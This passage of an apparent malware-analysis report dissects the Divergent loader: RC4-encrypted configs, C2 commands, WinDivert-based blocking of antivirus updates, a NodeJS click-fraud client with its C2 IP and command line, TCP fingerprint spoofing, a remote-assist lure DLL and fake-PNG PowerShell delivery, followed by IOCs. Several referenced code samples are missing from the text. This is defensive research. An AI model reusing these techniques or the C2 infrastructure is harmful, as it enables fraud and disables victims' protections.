The set of direct IP URLs found in the first configuration's acll key are contacted until one server responds back with a configuration update. A response containing an RC4 encrypted update to the first of the malware's configurations in the Registry. In this sample, the RC4 key "seiC4aimaish9zah8kah" is static, and decryption results in a lengthier update for the first configuration:
The data is stored in the pre-existing registry subkey to update the value (in this example, HKLM\SOFTWARE\ZfjrAilGdH\194956). As of Sept. 9, 2019, the version timestamp for the latest config pulled was Thursday, Aug. 29, 2019 11:50:19 a.m.

The second configuration is stored in the last remaining value in the ZfjrAilGdH registry subkey (HKLM\SOFTWARE\ZfjrAilGdH\2177774). Default values mentioned near the beginning of this section remained in use during runtime.

The primary flow of the malware code reaches an end but repeats select tasks every 90 minutes. It continues to check for configuration updates, continues to send encrypted sensitive information from the infected host, and continues to process any C2 responses that might contain additional commands to execute. The following commands and parameters are supported by the C2 protocol used by Divergent:

• killall: Terminate all processes initiated by the malware, delete corresponding files
• kill: Find process of specified component, terminate process, and delete the file
• stop: Find process of specified component, terminate process
• resume: Given pre-existing component, execute file
• modules: From the same response data, pull additional configuration data from the following keys:
• name
• filename
• args
• version
• type
• download
• Key

Using this data, the malware sends additional requests to download each specified file. The files are written to disk and executed.

• update: From the same response data, pull additional configuration data from the following keys:
• filename
• download
• Key

Same as the modules command, the malware sends additional requests to download each specified file. Each file is written to disk and executed. Finally, the task deletes the Registry data stored in its subkey (handles both HKCU and HKLM).

The command update_interval modifies the main thread's sleep counter for the ending loop (the default time is 90 minutes).

Components

Block AV component

The block_av_01 component attempts to block anti-virus software from receiving updates by blocking all outbound TCP connections on port 80 and port 443. With older revisions of this malware package, this functionality was delivered via a JScript file named bav01.js but in newer versions, this has been seen delivered by PowerShell in the fake PNG trpl.png (see Fake PNG PowerShell Delivery).

This installation script starts by creating a new folder (e.g. SystemConfigInfo000) to hold the files necessary for execution. The two files to be installed are WinDivert.dll and either WinDivert32.sys or WinDivert64.sys, depending on the host CPU architecture. These are the legitimate WinDivert binaries and are used by the malware to create its packet filter.

The WinDivert binaries are embedded in bav01.js as comments and written to disk with .b64 extensions. The following is the code to retrieve the embedded resource named arch5 from the script, embedded in a comment block in the format /*[<resource name>[resource data]]*/:
Each WinDivert binary is then decoded from base64 using the Windows Certificate Services utility certutil.exe. For example:
This script is set to execute as a task each time the computer starts. This is accomplished by creating a scheduled task with a random-looking service name that is set to run as the SYSTEM user at the highest run level:
Next, the following PowerShell command is executed (shown here decoded) to execute the base64 encoded PowerShell commands in the environment variable 'nttyuuyt':
The 'nttyuuyt' environment variable was set by bav01.js previously and contains a base64 encoded PE and the PowerShell commands necessary to reflectively inject this executable (truncated for readability):
At this point in the script, installation is complete and the PE-based module to block anti-virus HTTP/HTTPS connections is loaded.

To achieve its anti-virus blocking, the reflectively loaded PE periodically checks the names of all running processes against a predefined list. If any process names appear in the list, the PIDs are added to the filter string passed to WinDivertOpen which will block all traffic to that process on remote ports 80 or 443. An example filter string is:

((processId=620 or processId=736) and (remotePort==80 or remotePort==443))

Example process names that would be blocked include msmpeng.exe (Windows Defender) and svchost.exe.

Click Fraud

The all_socks component is a NodeJS-based Socket.IO client that is commanded to navigate to arbitrary web pages by the attacker ostensibly for monetization and click fraud purposes. With older revisions of this malware package this functionality was delivered via a JScript file named either 04sall.js or 05sall.js, but in newer versions this has been seen delivered by PowerShell in the fake PNG strpk.png (see Fake PNG PowerShell Delivery).

Like the anti-virus blocking component, the click fraud component makes use of the WinDivert library and therefore installs the necessary WinDivert DLL and driver in the same manner as bav01.js, described above. Additionally, the NodeJS executable and a NodeJS Socket.IO client named app.js are part of the installation process for this component. Older versions of this component also installed two executables, divergent.exe and mdivergent.exe, however in later versions, these are executed from memory via reflective PE injection.

The malicious NodeJS application, seen either as app.js or init.js, is a simple Socket.IO client that takes a base64 encoded IP address as its only parameter.

node.exe app.js <base64 encoded IP>

In all samples we have encountered, the IP address has been 176.9.117.194 (encoded as MTc2LjkuMTE3LjE5NA==). Upon execution, the malicious NodeJS app will make a request to the IP passed as a parameter:
The response from this server is the address of the next server which the application will connect to. This new connection uses Socket.IO web sockets to maintain continuous communication between the victim and the server so the server can periodically send commands. The commands sent from this second server contain the host address of an advertisement revenue service and the entire HTTP request that should be made to that server, effectively faking a click on an advertisement link.
To protect themselves from these kinds of fraudulent requests, advertisement monetization services may go to extra lengths to confirm the device making the request is the type of device it claims to be. For example, if the monetization service only expects mobile devices, it may reject requests that have the characteristics of desktop devices. We believe the divergent.exe and mdivergent.exe executables are used by the 04sall.js/05sall.js components to circumvent these kinds of checks (see TCP/IP stack fingerprinting).

The divergent and mdivergent PEs make use of the WinDivert library to intercept and rewrite the first SYN packet of the 3-way TCP handshake for all outgoing connections the infected host attempts to make. The changes made to the SYN packets depend on which executable was used, either divergent.exe or mdivergent.exe; divergent.exe will rewrite the TCP header options to follow the same format as Android devices while mdivergent.exe will rewrite the TCP header options to follow the format as iOS devices. Which version of the divergent executable is used is dependent on the app.js deployment script (either 04sall.js or 05sall.js). These scripts contain code that decides which version should be used depending on a variable named macchance which can be passed to the deployment script as its only parameter. This variable contains the probability that mdivergent.exe will be deployed instead of divergent.exe (the PowerShell parameter, normally base64 encoded, is shown here in its decoded form):
In the code shown above, the variables and and mac correspond to the code necessary to reflectively inject divergent.exe and mdivergent.exe respectively, i.e. and represents Android and mac represents iOS.

For either of these divergent executables to work properly, several changes to the TCP/IP stack on the infected machine must be made; these include setting the TTL to 64, turning on the timestamp TCP header options, and changing the MTU to 1440. Once those changes have been made, the system is forced to reboot with a false message of Critical_Windows_Update:
With these changes made, the divergent executables can perform the necessary modifications to each SYN packet so that they follow the standards of the device the host should be disguised as.

During our analysis of systems actively infected with Divergent, we observed several web requests initiated by the malware attempting to interact with various online advertisements and advertising platforms, indicative of the previously described click-fraud process performed by the malware. Similar to what was observed related to the modification of the TCP configuration, the User-Agent field was modified to make the web requests appear as if they had originated from a mobile device. Web requests were made to various online advertising services and were similar to the following:
We also observed additional web requests similar to the following, which included a standard desktop User-Agent:
Additionally, the malware attempts to interact with “in-app” advertising platforms such as Mobfox.

Now I See You

The component named call_03 by the malware's configuration file, which is delivered by the em_02.js and em_03.js scripts, appears to be a means of installing a remote assist tool on the infected machine that would allow the attacker to view and possibly control the victim's computer.

Like the previous components, the PE associated with em_03.js is executed via reflective PE injection, this time with the environment variable fdghjgfdhj.
The PE to be injected is a DLL which, according to its export table, was originally called now_i_see_you.dll. This DLL has a single exported function named VoidFunc which contains all of its functionality. When VoidFunc is executed, it makes an HTTP GET request to the hxxps://uoibppop[.]tk/. It then takes the response from this server and treats it as a new URL to navigate to. Using COM objects, the DLL launches an instance of Internet Explorer, resizes the window to fit the entire screen and navigates to the URL in the response. At the time of analysis, the server was active but did not respond with any data so we were unable to confirm what was being hosted there.

Additionally, the DLL hides the Windows taskbar so the user is more compelled to comply with any instructions on the page that is presented to them. Next, the malware enters a loop looking for a process containing the string gotoassist (older versions also looked for teamviewer), ostensibly for confirming that the user followed the instructions in Internet Explorer by downloading and running the attacker's malware. Once this process is running, the Windows Taskbar is restored to view. A process list is gathered and sent to the URL hxxps://uoibppop[.]tk/clean; no response is expected from the server. The registry key `HKEY_CURRENT_USER\Software\fbsjbdfhsv` is created and the key value `weqr` is set to 1, indicating that execution was successful, then the process exits. Instead of a URL, the attacker has the option to send the word stop to the victim which will cause the DLL to forcefully reboot the infected machine.

While we do not know what URL the victim is intended to navigate to and therefore which program they are to be tricked into running, based on the process names gotoassist and teamviewer and the original DLL name of now_i_see_you.dll, it is likely that the victim is intended to install one of these remote administration software.

Fake PNG PowerShell delivery

Newer versions of the Divergent malware package no longer deliver and execute components as JScript, instead multi-stage PowerShell scripts are used. The first stage will retrieve the second stage from a static URL. The first-stage PowerShell is heavily obfuscated:
Here is our deobfuscated version:
While the requested resource features the extension normally associated with PNG images, it is actually malicious Powershell that has been encrypted using RC4 with the encryption key "raimeey2nu," which was stored in the previous PowerShell (the particular implementation of RC4 used can be found here).

We have encountered following URLs to retrieve the encrypted PowerShell:

• hxxp://1292172017[.]rsc.cdn77[.]org/images/trpl.png
• hxxp://1292172017[.]rsc.cdn77[.]org//imtrack/strkp.png

The first URL delivers the PowerShell version of bav01.js and the second delivers the PowerShell version of 05sall.js.

Taking a deeper look at the PowerShell version of 05sall.js, we see Base64 encoded blobs corresponding to binaries associated with WinDivert. Like its JScript counterpart, the Powershell decodes these blobs and saves them to the filesystem location defined by the environment variable %ALLUSERSPROFILE%.
Shellcode stored within the PowerShell is loaded into a new memory region using the Windows API function VirtualAlloc and then executed to continue the infection process:

Conclusion

The malware loader described is currently under active development. Talos has observed multiple versions of the loader being used to install the Divergent malware. Attackers are attempting to monetize these infections through the use of click fraud. The threat landscape is constantly evolving as attackers test new techniques and methodologies to maximize their revenue generation capabilities. Organizations should be aware of these changes and ensure that their security programs are able to remain effective against these changing tactics, techniques, and procedures. This threat is successfully stopped by the Cisco Advanced Malware Protection (AMP) Exploit Prevention engine, and the resulting event data assisted with our analysis of the threat. Talos will continue to monitor the threat landscape to ensure that customers remain protected.

Coverage

Additional ways our customers can detect and block this threat are listed below.


Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Indicators of Compromise (IOCs)

The following IOCs have been observed as being associated with these malware campaigns.

HTA Hashes:

47b5dac9152220fbbf122eff89ac93d42e9196f5ab665a2a6d99594246ab8a81
062688aec1bdf1208bd72a77696e1fbcd1076f54bd6e59141ed12b6f8e3ba32c

PE32 Hashes:

c7052f4676102bfe39ab19c227832861caa2959933e296ee1806973619948624
781adc919a705ca3e8a82fe1d1eac68f651c50ba402172aea033eaec7879e932
05fbd38ea0b99621d22ce5f057173fdec40f3dccd63f887e1c301766c6597714
2135acda2d2739773fbb827e8d180ac901c040d2f071127bb597a714591672cd
72b6a8bf9598bd445e26a04ab58be62ed3941fb1fe4cf4a094a6272a77b66009
ba04eacaa80bb5da6b02e1e7fdf3775cf5a44a6179b2c142605e089d78a2f5b6
a82dd93585094aeba4363c5aeedd1a85ef72c60a03738b25d452a5d895313875
2f4a9ef2071ee896674e3da1a870d4efab4bb16e2e26ea3d7543d98b614ceab9
77498f0ef4087175aa85ce1388f9d02d14aaf280e52ce7c70f50d3b8405fea9f
b2d29bb9350a0df93d0918c0208af081f917129ee46544508f2e1cf30aa4f4ce
bf2cdd1dc2e20c42d2451c83b8280490879b3515aa6c15ab297419990e017142
ba04eacaa80bb5da6b02e1e7fdf3775cf5a44a6179b2c142605e089d78a2f5b6
a7656ccba0946d25a4efd96f4f4576494d5f1e23e6ad2acc16d2e684656a2d4f
607b2f3fd1e73788a4d6f5a366c708dbb12d174eba9863ade0af89ca40e1fdba

URLs:

hxxps://1292172017[.]rsc[.]cdn77[.]org/images/trpl.png
hxxps://1292172017[.]rsc[.]cdn77[.]org/imtrack/strkp.png

Mutexes:

Global\Divergent
Global\CreatorsPatch
Global\LocalLow7

IP Addresses:

95[.]70[.]244[.]209
13[.]228[.]224[.]121
54[.]241[.]31[.]99
103[.]31[.]4[.]11
103[.]31[.]4[.]54
198[.]41[.]128[.]74
198[.]41[.]128[.]55
131[.]0[.]72[.]36
131[.]0[.]72[.]59
188[.]114[.]96[.]87
188[.]114[.]96[.]116
43[.]250[.]192[.]98
43[.]250[.]192[.]87
217[.]160[.]231[.]125
208[.]91[.]197[.]25
184[.]168[.]221[.]42
103[.]224[.]248[.]219
31[.]31[.]196[.]120
217[.]160[.]223[.]93
103[.]224[.]248[.]219
184[.]168[.]221[.]45
119[.]28[.]87[.]235
23[.]227[.]38[.]32
50[.]63[.]202[.]39
216[.]239[.]34[.]21
83[.]243[.]58[.]172
5[.]9[.]41[.]178
88[.]198[.]26[.]25
62[.]75[.]189[.]110
109[.]239[.]101[.]62
107[.]186[.]67[.]4
184[.]168[.]221[.]63
45[.]55[.]154[.]177
104[.]28[.]2[.]169
202[.]56[.]240[.]5
89[.]163[.]255[.]171
185[.]243[.]114[.]111